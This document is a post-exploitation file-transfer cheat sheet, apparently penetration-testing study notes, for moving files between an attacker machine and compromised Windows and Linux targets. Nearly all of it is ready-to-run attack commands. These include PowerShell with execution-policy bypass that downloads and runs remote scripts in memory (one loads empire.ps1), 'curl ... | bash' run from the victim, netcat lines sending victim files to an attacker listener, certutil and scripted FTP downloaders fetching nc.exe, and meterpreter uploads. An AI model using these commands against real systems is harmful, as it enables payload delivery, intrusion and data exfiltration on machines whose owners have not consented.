File Transfers

(Almost) All The Ways to File TransferMedium

File Transfer Cheatsheet: Windows and Linux - Hacking ArticlesHacking Articles

Transferring Files from Linux to Windows (post-exploitation)ropnop blog

Server

# HTTP - Apache2

# cp file /var/www/html/file_name

sudo service apache2 start

# HTTP - Python. Default port 8000

# python2

sudo python -m SimpleHTTPServer 80

# python3

sudo python3 -m http.server 80

# SMB

sudo impacket-smbserver <share_name> <path/to/share>

# FTP

# apt-get install python-pyftpdlib

sudo python -m pyftpdlib -p 21

# TFTP (UDP)

sudo atftpd --daemon -port 69 /path/to/serve

# Netcat

nc -nvlp <port> < file/to/send

Linux - HTTP

# Wget

wget http://<ip>/file_name -O /path/to/save/file

# Netcat

nc -nv <ip> <port> > file/to/recv

# cURL

curl http://<ip>/file_name --output file_name

Windows

HTTP

# Does not save file on the system

powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"

# Saves file on the system

powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"

powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save

Wget.ps1 (script)

echo $storageDir = $pwd >> wget.ps1

$webclient = New-Object System.Net.WebClient >> wget.ps1

# Download file from

$url = "http://<ip>/file_name" >> wget.ps1

# Save file as

$file = "file_name"

echo $webclient.DownloadFile($url,$file) >>wget.ps1

# execute the script as follows

powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

TFTP (UDP)

tftp -i <ip> get file_name

SMB

# cmd.exe

net use Z: \\<attacker_ip>\share_name

# To access the drive

Z:

# PowerShell

New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name"

# To access the drive

notmalicious:

FTP

ftp <ip>

ftp>binary

ftp>get file_name

# One-liner downloader

# in cmd.exe do not use quotes in an echo command

echo open <ip> >> download.txt

echo anonymous >> download.txt

echo anon >> download.txt

echo binary >> download.txt

get file_name >> download.txt

bye >> download.txt

ftp -s:download.txt

Host Webserver Method 1

• Move files into your /var/www/html folder

• service apache 2 start

• • To start your web server

• wget <your attacking machine's ip>/<path to file>

• • Run this from the victim machine

Host to Webserver Method 2

• Navigate to the directory that you want to serve over HTTP

• Python -m SimpleHTTPServer

• Python3 -m http.server

• • To start a webserver (runs on port 8000 by default)

• curl <your attacking machine's ip>:8000/<file name> | bash

• • Just another way of grabbing a file from your webserver

  • This cmd is ran from the victim machine

nc transfer from victim machine to attacker machine

• On the machine set up a netcat listener on some port (e.g. 999)

nc -l -p <listener port> > <file name that you want to direct the input to>

E.g.

nc -l -p 999 > ovrfl

• On the victim machine (shell)

nc -w 5 <attacker IP> <attacker LPORT> < <path to file to send>

E.g.

nc -w 5 10.10.14.9 999 < /usr/local/bin/ovrflw

SCP

• when you have login credential

• from attacker machine

scp <user>@<ip address> :<file name> .

• the default location for the file is the user's home directory

Invoke-WebRequest (wget) - Powershell

File Hosting (from attacker machine)

=====HTTP Method=====

• using apache or python -m from your attacker box

python -m SimpleHTTPServer

With Python3

python3 http.server <port #>

===== Method=====

apt-get install python-pyftpdlib

• cd to the directory where the files that you want to transfer are located

python -m pyftpdlib -p 21

File Transfering (from Windows target)

=====Powershell=====

wget <URL>

powershell > IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/empire.ps1')

OR

# Create a web client object

$webClient = New-Object System.Net.WebClient

# Create file path you want to save it to

$filename = <path to file>

# Downloads the file and saves it as $filename

Add-Content -Path $filename -Value $webClient.DownloadString('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Cracked-Hashes/milw0rm-dictionary.txt')

Without Powershell

certutil -urlcache -f <URL> <output file name>

• this transfer method can sometimes mess up binary executables

=====FTP=====

ftp <attacker ip address>

login: anonymous

password: anonymous

*** ftp -A <ip address> is a shortcut for for anonymous ftp login

ftp> binary

ftp> get <file name>

=====FTP (scripted method)=====

echo open <attacker ip> <ftp port> > ftp.txt

echo anonymous >> ftp.txt

echo anonymous >> ftp.txt

echo binary >> ftp.txt

echo get <file name> >> ftp.txt

echo bye >> ftp.txt

• run ftp with this file

ftp -s:ftp.txt

# e.g. creates and runs file

open 10.11.0.76 21

anonymous

anonymous

binary

get nc.exe

bye

=====Metasploit Method=====

this method assumes that you already have a meterpreter shell on the windows target

• From meterpreter you are able to upload a file to the target or download a file from the target

e.g.

upload /root/ft/exploit.txt C:\\Users\\Heath\\Desktop

• when specifying the destination location on the windows filesystem, you must escape the backslashes with backslash